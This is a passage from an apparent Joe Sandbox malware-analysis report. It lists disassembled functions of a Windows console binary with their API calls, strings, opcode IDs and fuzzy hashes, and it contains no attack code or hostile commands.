                                                                                                          • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                          • Instruction Fuzzy Hash: 8151C3A1B1A64287EA266F19F544179E6A1FF44799F8A4135CE4E037B4EF3CE4418B20
                                                                                                          Function 00007FF7AB1289C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 850181435-0
                                                                                                          • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                          • Instruction ID: fe6f39f10bffbf92e9c3220f9a73ce9aa3ff24c0dc43868dc1c0cdf2c749e803
                                                                                                          • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                          • Instruction Fuzzy Hash: 4841C532609BC1C9E7719F24E8842EDBBA4FB89B48F864135DA4D47B64DF38D549C710
                                                                                                          Function 00007FF7AB1334A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133514
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133522
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133541
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13355E
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 4057327938-0
                                                                                                          • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                          • Instruction ID: e86119bcd6c09c62dc151bd53d74fe61b768fe7138b18aa80ab55155fe7b0f06
                                                                                                          • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                          • Instruction Fuzzy Hash: 9D318322E0A60286E7967B1DF444079F6A0FF89748FD65135D90E433B5EF3CE8498720
                                                                                                          Function 00007FF7AB14BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                          • String ID: KEYS$LIST$OFF
                                                                                                          • API String ID: 411561164-4129271751
                                                                                                          • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                          • Instruction ID: 8bceee08530909801018ed9ee0586fd97c8fde831894763a014bce01f57a8cf6
                                                                                                          • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                          • Instruction Fuzzy Hash: DF216D60A0A603D2F656BB2DF495176F6A1FF84798FC29331C61E432F4EE3DA8448760
                                                                                                          Function 00007FF7AB1301B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130212
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130228
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13023C
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB130251
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 513048808-0
                                                                                                          • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                          • Instruction ID: 31079997c629a2ed2679cecaec16271bc86c2216dd27545dfce522d4f86a2591
                                                                                                          • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                          • Instruction Fuzzy Hash: A3217F3190E68287E6966B6CF588338EAD0FB4975DF964235D91F436B0EF7CD4488720
                                                                                                          Function 00007FF7AB133578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 513048808-0
                                                                                                          • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                          • Instruction ID: 19cefe89adc57d74a72b005c31f62415baaebb1870e53760679bdcdb7ee5fb1a
                                                                                                          • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                          • Instruction Fuzzy Hash: 2A116631A0A64286EA556B2CF584078EA90FF4A77DF966335D92F433F0EE3CD4888710
                                                                                                          Function 00007FF7AB139584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104442557-0
                                                                                                          • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                          • Instruction ID: 456b2dd6a680bf054ad0d54fb98d15e66760bb88230766a7d0a192db98420bf4
                                                                                                          • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                          • Instruction Fuzzy Hash: EB112421B06B418AEB01EF78F8841A873A4F75975CF810A34EA6E47774EF7CD5A48350
                                                                                                          Function 00007FF7AB14711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1471F9
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB14720D
                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB147300
                                                                                                            • Part of subcall function 00007FF7AB145740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7AB1475C4,?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB145744
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 455305043-1814513734
                                                                                                          • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                          • Instruction ID: d6dc1d64aa8de0221e91a377947d8b262fb8cabd7982f9d04b78478966d7309b
                                                                                                          • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                          • Instruction Fuzzy Hash: F561C4A2B1A64281EE26AF5DE4506B9A3D1FF44B88FC64531D90E47775FF3CD5058320
                                                                                                          Function 00007FF7AB121DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                          • String ID: %s
                                                                                                          • API String ID: 2401724867-3043279178
                                                                                                          • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                          • Instruction ID: 3faaac2c4f6b15b076513014651d2813cb13cea8fa62761c423ffe1009e3505c
                                                                                                          • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                                                                          • Instruction Fuzzy Hash: 9451E772B0A68285EB22AF19F8402B9B3A0FB4978CF864134D95D077B4EF3CD455C720
                                                                                                          Function 00007FF7AB12E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3849470556-1994581435
                                                                                                          • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                          • Instruction ID: 8fd81ccb908bf0893e0898e5b79b205ee9f09b7a11ba35c19071416c6c15e541
                                                                                                          • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                          • Instruction Fuzzy Hash: 6A518A32A0A642C5EB66AF1DF444679B7A4FB44B18F868435DA4D433B0EF7DE884C760
                                                                                                          Function 00007FF7AB14992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB149A10
                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB149994
                                                                                                            • Part of subcall function 00007FF7AB14A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                            • Part of subcall function 00007FF7AB14A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                            • Part of subcall function 00007FF7AB14A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          • wcsrchr.MSVCRT ref: 00007FF7AB149A62
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                          • String ID: %s=%s$.
                                                                                                          • API String ID: 3242694432-4275322459
                                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                          • Instruction ID: c29bd38e525ec606419cc93c7ee398349b66e6168f8c911a398380d5a8d882a8
                                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                          • Instruction Fuzzy Hash: 8941A161A0A7428AEA16BB19F0502B9E291FF857E8F968630DD5D077F5FE3CE4458320
                                                                                                          Function 00007FF7AB1454B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1454E6
                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB14552E
                                                                                                            • Part of subcall function 00007FF7AB14758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475AE
                                                                                                            • Part of subcall function 00007FF7AB14758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475C6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                          • API String ID: 779401067-630742106
                                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction ID: 068108f11691cd38fb69f9a504f75309029438aa0c5074cee22e65278b6afdfe
                                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction Fuzzy Hash: A75185B261968281EB12AB19F4407FAE761FF8478CFD24031EA4D8BA75EE7DD505C720
                                                                                                          Function 00007FF7AB13417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectorytowupper
                                                                                                          • String ID: :$:
                                                                                                          • API String ID: 238703822-3780739392
                                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
